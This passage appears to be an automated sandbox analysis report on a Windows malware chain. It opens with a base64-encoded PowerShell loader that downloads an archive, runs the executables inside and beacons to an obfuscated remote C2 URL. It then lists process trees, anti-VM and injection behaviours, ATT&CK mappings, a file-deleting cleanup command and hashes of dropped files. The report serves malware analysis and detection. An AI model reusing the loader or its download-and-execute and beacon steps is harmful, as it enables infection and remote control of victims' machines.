QA5AEwAUQBqAFkAMgBPAFQAVQA0AE4AagBRADIAJwApACkACgAgACAAIAAgACQAawA0AFYAOQBqAE0AIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAHIANwBQADMAYwBIACAAJABtADYARQA0AGoAVgA7ACAAJAB0ADUAVwAyAG8ARAAgAD0AIABAAHsAIAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAgAD0AIAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADEAMAAuADAAOwAgAFcAaQBuADYANAA7ACAAeAA2ADQAKQAgAEEAcABwAGwAZQBXAGUAYgBLAGkAdAAvADUAMwA3AC4AMwA2ACAAKABLAEgAVABNAEwALAAgAGwAaQBrAGUAIABHAGUAYwBrAG8AKQAgAEMAaAByAG8AbQBlAC8AMgAzAC4AMAAuADAALgAwACAAUwBhAGYAYQByAGkALwA1ADMANwAuADMANgAnACAAfQAKACAAIAAgACAAdwBoAGkAbABlACAAKAAkAHQAcgB1AGUAKQAgAHsACgAgACAAIAAgACAAIAAgACAAdAByAHkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAegAzAEcAOAB3AEYAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGsANABWADkAagBNACAALQBIAGUAYQBkAGUAcgBzACAAJAB0ADUAVwAyAG8ARAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGsANABWADkAagBNACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHgANABUADIAcgBGACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAGEASABSADAAYwBIAE0ANgBMAHkAOQBuAGEASABWAG0AWQBXAHcAdQBZAFcANQB6AGQAMgBWAHkAYgBXAFYAawBhAFcARQB1AGMAMgBsADAAWgBTADkATABRAGkAOQB3AGIAMwBOADAATABuAEIAbwBjAEQAOQB6AGQARwBGADAAZABYAE0AOQBNAGcAPQA9ACcAKQApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4ADQAVAAyAHIARgAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBIAGUAYQBkAGUAcgBzACAAJAB0ADUAVwAyAG8ARAAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQA7ACAAYgByAGUAYQBrAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIABFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAkAGsANABWADkAagBNACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACQAcgA3AFAAMwBjAEgAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADIACgAgACAAIAAgACQAbgA4AFUANAB0AFMAIAA9ACAAJABmAGEAbABzAGUACgAgACAAIAAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAHIANwBQADMAYwBIACAALQBGAGkAbAB0AGUAcgAgACoALgBlAHgAZQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAaQAzAEoANgBwAFgAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwAKACAAIAAgACAAIAAgACAAIAAkAGkAMwBKADYAcABYAC4ARgBpAGwAZQBOAGEAbQBlACAAPQAgACQAXwAuAEYAdQBsAGwATgBhAG0AZQAKACAAIAAgACAAIAAgACAAIAAkAHkAMgBIADUAdgBRACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMACgAgACAAIAAgACAAIAAgACAAJAB5ADIASAA1AHYAUQAuAFMAdABhAHIAdABJAG4AZgBvACAAPQAgACQAaQAzAEoANgBwAFgACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAHkAMgBIADUAdgBRAC4AUwB0AGEAcgB0ACgAKQApACAAewAgACQAbgA4AFUANAB0AFMAIAA9ACAAJAB0AHIAdQBlACAAfQAKACAAIAAgACAAfQAKACAAIAAgACAAaQBmACAAKAAkAG4AOABVADQAdABTACkAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAdQAxAEsANQB5AFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBIAFIAMABjAEgATQA2AEwAeQA5AG4AYQBIAFYAbQBZAFcAdwB1AFkAVwA1AHoAZAAyAFYAeQBiAFcAVgBrAGEAVwBFAHUAYwAyAGwAMABaAFMAOQBMAFEAaQA5AHcAYgAzAE4AMABMAG4AQgBvAGMARAA5AHoAZABHAEYAMABkAFgATQA5AE0AdwA9AD0AJwApACkACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdQAxAEsANQB5AFoAIAAtAE0AZQB0AGgAbwBkACAAUABPAFMAVAAgAC0ASABlAGEAZABlAHIAcwAgACQAdAA1AFcAMgBvAEQAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAH0ACgB9AAoAJAB3ADgAVgAyAHAAWgAuAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAkAHcAOABWADIAcABaACAAPQAgAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJwBlAHgAJwArACcAaQB0ACcAKQA7ACAAJgAkAHcAOABWADIAcABaAAoA
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\ezcd.exe
    "C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\ezcd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Users\Admin\AppData\Roaming\uwt_http\ezcd.exe
      C:\Users\Admin\AppData\Roaming\uwt_http\ezcd.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Modifies registry class
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:2392
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1000
      - C:\Users\Admin\AppData\Local\Temp\mt2.exe
        
        C:\Users\Admin\AppData\Local\Temp\mt2.exe
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3340
        
        C:\ProgramData\IIJEBAECGC.exe
        
        "C:\ProgramData\IIJEBAECGC.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:4376
        
        C:\Windows\SysWOW64\more.com
        
        C:\Windows\SysWOW64\more.com
        8⤵
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3880
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        9⤵
        
        PID:5080
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGIIJDHCGCBK" & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1224
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        8⤵
        Delays execution with timeout.exe
        
        PID:4920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Privilege Escalation

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\EGIIJDHCGCBK\BGIIEG

Filesize
64KB

MD5
17c68f413cd198954a32a8ae4e72314c

SHA1
e46d1da0ae38baa702a92553ffeb6e8a40fade62

SHA256
63b05ad30d875c3d9f0225556cd7de950d2b9bdeb763886e35ab721a24e9c454

SHA512
cad1aacc64e60a65a80654c5af61caa9b2db12fb63e2bf2d34641dfb9c713507022e613e3d1aec1c662546bae164d63b84ca43083beee06e2e83a422fbdeddf3

Download Submit
C:\ProgramData\EGIIJDHCGCBK\ECGDBA

Filesize
64KB

MD5
544977b473ab90edc1ff50bc05ac63fa

SHA1
7042e5375167ba9b5503ffb91663c88a74faeb75

SHA256
b9daeab1ddfe32ef5539e28cd719f8064395de69ec9a1b180ce74c88890c6cb5

SHA512
51e3a0e8d2921f72f81974e6cad89c7856b0a549473defe46b9e5300a36330198b2d0a12af66a4fc0f80aba2c7d413e6e2ad776420614d183dbfd9b443eeee25

Download Submit
C:\ProgramData\IIJEBAECGC.exe

Filesize
4.8MB

MD5
9bb91216e8c3979a562860145348698c

SHA1
5c27357e62e78e9537f12fff51389770b8c0b6fe

SHA256
b3cd9273df274c0940a19998d70dc5cc36ab33d772b2c1ebb1724ff0afc7a4cc

SHA512
917431f1defedda4d934ff60e9f193650c0b0e3281b887802850c089173d4595e72d1ca01f48e0f824b82c3fa9e5b80b34cf14121e411a22869ae226d65cb57a

Download Submit
C:\ProgramData\Licenses\01D69EEBF42E950EA.Lic

Filesize
146B

MD5
83c3049ba3459989a689f53f6747c5a7

SHA1
e2772fde3d275615c520e2abb679dbb2606c0b8c

SHA256
6f7491a132e56e26458d3cb9fbc3be9146ad69a4ab41e5090e2ff6074553c61f

SHA512
0c3f0ff71eae490074f99f40833bd547a72fa9650440801a5a8d718fb9a282f7032be11eb8aa85ae9ece0f4e8f7b61d4a1a3bbf4b1244de7067e572eeca80c67

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ece429bd6c3dd409f0f4faafaf4509f8

SHA1
ef8906829f6bfaf95022bc54846fbae4729997e7

SHA256
55adcc64b51de668bf2777beb1de4c25cc06e03b390a5b7c91831e62a9bed4bd

SHA512
d34606afa09d58061df7255c6d166324a7e942927b2eb3f1809bd11f547c735b423e19a9bf7fbb236a6157cda7d2fdb73678e5c3de3b8a240709ceceda904fc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
355c1e3f5a86a0f7a8874a308a83ab70

SHA1
6414d406db70ef25090c13952bb542cdca08287f

SHA256
ebbfa101da9091d0f34b2b0c25441f0e71c9c66338dba091d75b4be22217fee3

SHA512
96a5b1d9c28cb3efe058c36c8160e9b63ed1460030c71afc59fa3706c86b86e1a483b95bd7048953572f873b7b1773b6a01a257afaa609baaee58dcf2901ab53

Download Submit
C:\Users\Admin\AppData\Local\Temp\410894de

Filesize
1.2MB

MD5
f1e0415325b1792930df6f20298827cb

SHA1
eee22902ef975366c54816f6eaaf4fe7a22be573

SHA256
094033928539ee1aba01b21d3c39c4054bd606755d482f27e84c6adb1f3b420b

SHA512
e50ee820fc6e75f87cacb36935317a6809c0145a2bf9bdf8624a0cc3b7729b468b5ccf631d671b2c94906c1a74d9fbde221e0cc6401ac8df82e078ceea76fc99

Download Submit
C:\Users\Admin\AppData\Local\Temp\43d7c560

Filesize
1.1MB

MD5
542d7973c116cbb582c253dda03abd21

SHA1
0caba73ffdc15d03ff2e16bd4f51f48318a0d267

SHA256
6078d479363d44787e95d3459dfbf4c407712db138d6d999fa341c30eae4f9bf

SHA512
a358091266a66c2f511df9cda2a6d84f2e1c2d641bf9c00a95c5089138ad56776612cdfb0099229c3e8492a16c113ee147c277afb3bc91e4270aeeebafe1a5c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\671e8179

Filesize
2.3MB

MD5
ed78408b1fda862b5aa16fc9db61b7e9

SHA1
a0f0d7f96694b9e343ddfb013757675293987d60

SHA256
992bae40444a11b391bf0690889ebac116ddcc89be379d5964ebf2d9164042d4

SHA512
7a0f3814d33ee0512d9c3c46301832a7963fdef64a4bed0e219f75916d3ec84761dcd2ed1a8a21a76a56331a9ac31c3ae49fe7cd96645f30aedef1d1437c504f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rnav045y.ryp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\VCRUNTIME140.dll

Filesize
116KB

MD5
699dd61122d91e80abdfcc396ce0ec10

SHA1
7b23a6562e78e1d4be2a16fc7044bdcea724855e

SHA256
f843cd00d9aff9a902dd7c98d6137639a10bd84904d81a085c28a3b29f8223c1

SHA512
2517e52f7f03580afd8f928c767d264033a191e831a78eed454ea35c9514c0f0df127f49a306088d766908af7880f713f5009c31ce6b0b1e4d0b67e49447bfff

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\acdbase.dll

Filesize
2.9MB

MD5
dace23695dcfa0f7309b65366ac75bc0

SHA1
c5b1bad2dec36852fae90f81f0dbd00518479c01

SHA256
cf8b85beeff99b13d06ed15c79e555ab74e30dfa1491a36c4332f54ed09887e4

SHA512
0e1e5fc158fb39c3c3c7733226cb846407cd01ca1c49800fb7668134ebef129ab43030f2768a8b149b5ba9a18b2d1b0f8bf23d1a8de487a482e9268e0b679bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-convert-l1-1-0.dll

Filesize
25KB

MD5
9f812bd3815909e559b15cb13489f294

SHA1
df751c956f59b4e3c82496d86895adc7cc1a1619

SHA256
ce6fcc2ddf21720c92bee04f5736a4787acffa970a1b0dbeea39ff5efec52c75

SHA512
0a360e8b81bf80cb6bdf240d627ddcf71b1a4ca42759de61b2d27fab521a8e6e3afa308cc69caf5a7c8b14d98d3d448f0d400ae1826cbe7d0f0ceafd14682064

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-environment-l1-1-0.dll

Filesize
21KB

MD5
1a72e5f24214eb723e03a22ff53f8a22

SHA1
578d1dbfb22e9ff3b10c095d6a06acaf15469709

SHA256
fda46141c236a11054d4d3756a36da4412c82dd7877daad86cb65bf53d81ca1a

SHA512
530e693daecc7c7080b21e39b856c538bb755516aafdb6839a23768f40bcfc38d71b19586e8c8e37bb1c2b7a7c31fcb8e24a2315a8dd90f50fec22f973d86cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-heap-l1-1-0.dll

Filesize
21KB

MD5
9d136bbecf98a931e6371346059b5626

SHA1
2466e66bfd88dd66c1c693cbb95ea8a91b9558cd

SHA256
7617838af1b589f57e4fe9fee1e1412101878e6d3287cdc52a51cd03e3983717

SHA512
8c720c798d2a06f48b106a0a1ef38be9b4a2aebe2a657c8721278afa9fdbab9da2a672f47b7996ca1ce7517015d361d77963c686e0ae637a98c32fd75e5d0610

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
25KB

MD5
6b39d005deb6c5ef2c9dd9e013b32252

SHA1
79a0736454befd88ba8d6bd88794d07712e38a67

SHA256
b0e50572eb82a46ed499775e95bfde7cb25c498957432c18c20cf930f332efd0

SHA512
50bc1f669499589a480379d72166dae701914427d51223994d63a0363420ca6fdde07010803270a62451afea9e4ae55206d8a4c00ca4680e7a9120cd33f99a0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-stdio-l1-1-0.dll

Filesize
25KB

MD5
97f24295c9bd6e1acae0c391e68a64cf

SHA1
75700dce304c45ec330a9405523f0f22e5dcbb18

SHA256
189d551fb3cba3dbb9b9c1797e127a52ac486d996f0ac7cba864fe35984a8d28

SHA512
cac75f623545c41b2597a25c14f2af7eb93e3e768b345d3b0e1928d8fd1f12bec39b18b8277f9550aa6a66d9cfe1bf6c3db93ae1eb2a6c07019d4f210b3e5998

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-string-l1-1-0.dll

Filesize
25KB

MD5
d282a4fa046d05d40d138cc68c518914

SHA1
d5012090399f405ffe7d2fed09650e3544528322

SHA256
8b1471101145343da5f2c5981c515da4dfae783622ed71d40693fe59c3088d7a

SHA512
718926e728627f67ba60a391339b784accd861a15596f90d7f4e6292709ac3d170bcbca3cbf6267635136cb00b4f93da7dfd219fa0beee0cf8d95ce7090409e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-time-l1-1-0.dll

Filesize
21KB

MD5
6d35a57a6d8d569f870b96e00e7f1f4d

SHA1
8407bdb3cd5ec15b2ce738b3dbd704aa289ce3e1

SHA256
f41511e477a164eb9451ca51fb3810437f3b15f21e6f5c6ce0956e84ec823723

SHA512
4317b86d32ca93e5f0d832819cf1ab8af68e853a19eb07dd1fa4d168a0b2a8eab309194884ed3a613b09fc6d511be872a053f76f00ea443499006cdd226fea8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\api-ms-win-crt-utility-l1-1-0.dll

Filesize
21KB

MD5
8ed70910380aa0b28317512d72762cc0

SHA1
0421518370f24f9559f96459d0798d98b81ea732

SHA256
f15af0db93d9385ff9d8efdc06aacd0729d0dfcb66e91ca0243bb160f2ed89d0

SHA512
b31ef07eaac310fdd3df3546246e7dc696595b8e92141e3db79a44ddc3358b12129e3829a53c76d0fef214e3f29dba77fa5d556211830a140ea34ff62258d9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\birdsfoot.msg

Filesize
1.5MB

MD5
0d5810516b7b6a26d88963f66de04c67

SHA1
7e49f0bcf5ed1fc969df6e6537cd2140f751f589

SHA256
a09117500765ed4eba0f23fbe93e3738d0202d6c55452645abf140502b10f1da

SHA512
8952d633c38bec2b46d3a1657f707d301d8e6779dee5893e9d063e18823528259da807336ec7f97df96e45b980b0b3c370aecac19bfb8a53efaef548d146823e

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\chapatti.csv

Filesize
61KB

MD5
e190875cd68980ff47f0e21e39b1195d

SHA1
e29eb6915fa989b6f06b5d2f87516ea1035d4b0c

SHA256
79bc40f3a7e3363345a9b976054bd14a8be41bfccbcad76e7223c84b7b2d36a9

SHA512
2f3fca8cbaaa7c19d7e6b60754d14104f5fd1e1ba948dcb7dde8c3f3e9c0caccedf71acb17239e5bb620c4a4d2b01cff5d830332cc68715ecc5d3997448b1336

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\ezcd.exe

Filesize
8.5MB

MD5
98169506fec94c2b12ba9930ad704515

SHA1
bce662a9fb94551f648ba2d7e29659957fd6a428

SHA256
9b8a5b0a45adf843e24214b46c285e44e73bc6eaf9e2a3b2c14a6d93ae541363

SHA512
7f4f7ac2326a1a8b7afc72822dae328753578eb0a4ffcec5adb4e4fb0c49703070f71e7411df221ee9f44d6b43a0a94921fe530877c5d5e71640b807e96def30

Download Submit
C:\Users\Admin\AppData\Local\Temp\euWylzFFkea7X\libmmd.dll

Filesize
4.0MB

MD5
f358fbeb396a3681f1bb3a3d5f58b245

SHA1
e35e918b3c666076d5c3f0c651992fe15ede2ff1

SHA256
f00e86fdb1d83387c4b2695142db8911ff310e99feaaafbbf714ceff5d7343f8

SHA512
4245391d4bee0115e316a2633a3db2df3363d5c7bc4e1dd2c6b34214ccbd4399ff350044bc46bf3b134052bb50b6b5839e485e9b7382baa0d18cb89c155566a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\mt2.exe

Filesize
1.4MB

MD5
9f67479b4c77dbbb380b23b813e5485f

SHA1
a827cba61914df8dcad8e2ecdad7b506c88b55f8

SHA256
a31132c9fd2d825ef1e5dfaa9f750d18b935810b87e0f560f7cb4369002064bd

SHA512
163b7fddc90816fb81ffbcde3f148c392a98e632653302882bdeb24dc798fc0526089800f21dcfa6c626dbd4e08549a929be24b970af291d997bd6405186eda9

Download Submit
memory/456-19-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/456-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/456-13-0x000001FC7FD30000-0x000001FC7FEF2000-memory.dmp

Filesize
1.8MB

Download
memory/456-14-0x000001FC1A450000-0x000001FC1A978000-memory.dmp

Filesize
5.2MB

Download
memory/456-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

Filesize
8KB

Download
memory/456-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/456-10-0x000001FC7FB30000-0x000001FC7FB52000-memory.dmp

Filesize
136KB

Download
memory/456-1-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/456-15-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/1000-168-0x00000000756A0000-0x000000007581D000-memory.dmp

Filesize
1.5MB

Download
memory/1000-166-0x00007FFBC9D00000-0x00007FFBC9F09000-memory.dmp

Filesize
2.0MB

Download
memory/2392-153-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-150-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-151-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-146-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-162-0x00007FFBBA8A0000-0x00007FFBBAA1A000-memory.dmp

Filesize
1.5MB

Download
memory/2392-149-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-148-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-144-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2392-163-0x00007FFBBA8A0000-0x00007FFBBAA1A000-memory.dmp

Filesize
1.5MB

Download
memory/2392-133-0x0000000004050000-0x0000000004238000-memory.dmp

Filesize
1.9MB

Download
memory/3340-176-0x00007FFBC9D00000-0x00007FFBC9F09000-memory.dmp

Filesize
2.0MB

Download
memory/3340-278-0x0000000000C60000-0x0000000000EA9000-memory.dmp

Filesize
2.3MB

Download
memory/3340-290-0x0000000000C60000-0x0000000000EA9000-memory.dmp

Filesize
2.3MB

Download
memory/3340-174-0x0000000000C60000-0x0000000000EA9000-memory.dmp

Filesize
2.3MB

Download
memory/3340-190-0x0000000000C60000-0x0000000000EA9000-memory.dmp

Filesize
2.3MB

Download
memory/3340-192-0x000000001BF80000-0x000000001C1DF000-memory.dmp

Filesize
2.4MB

Download
memory/3340-283-0x0000000000C60000-0x0000000000EA9000-memory.dmp

Filesize
2.3MB

Download
memory/3880-296-0x0000000073060000-0x00000000731DD000-memory.dmp

Filesize
1.5MB

Download
memory/3880-284-0x00007FFBC9D00000-0x00007FFBC9F09000-memory.dmp

Filesize
2.0MB

Download
memory/3880-291-0x0000000073060000-0x00000000731DD000-memory.dmp

Filesize
1.5MB

Download
memory/4376-252-0x00007FFBBA340000-0x00007FFBBA4BA000-memory.dmp

Filesize
1.5MB

Download
memory/4376-279-0x00007FFBBA340000-0x00007FFBBA4BA000-memory.dmp

Filesize
1.5MB

Download
memory/4376-246-0x0000000000400000-0x00000000008DC000-memory.dmp

Filesize
4.9MB

Download
memory/4632-94-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-99-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-95-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-97-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-96-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-108-0x00007FFBBA8A0000-0x00007FFBBAA1A000-memory.dmp

Filesize
1.5MB

Download
memory/4632-92-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-90-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/4632-79-0x0000000004080000-0x0000000004268000-memory.dmp

Filesize
1.9MB

Download
memory/5028-69-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-32-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-33-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-31-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-35-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-36-0x00000277FE840000-0x00000277FEFE6000-memory.dmp

Filesize
7.6MB

Download
memory/5028-21-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-20-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5028-38-0x00000277FE230000-0x00000277FE242000-memory.dmp

Filesize
72KB

Download
memory/5028-39-0x00000277FE210000-0x00000277FE21A000-memory.dmp

Filesize
40KB

Download
memory/5028-86-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

Filesize
10.8MB

Download
memory/5080-300-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5080-302-0x00007FFBC9D00000-0x00007FFBC9F09000-memory.dmp

Filesize
2.0MB

Download
memory/5080-303-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download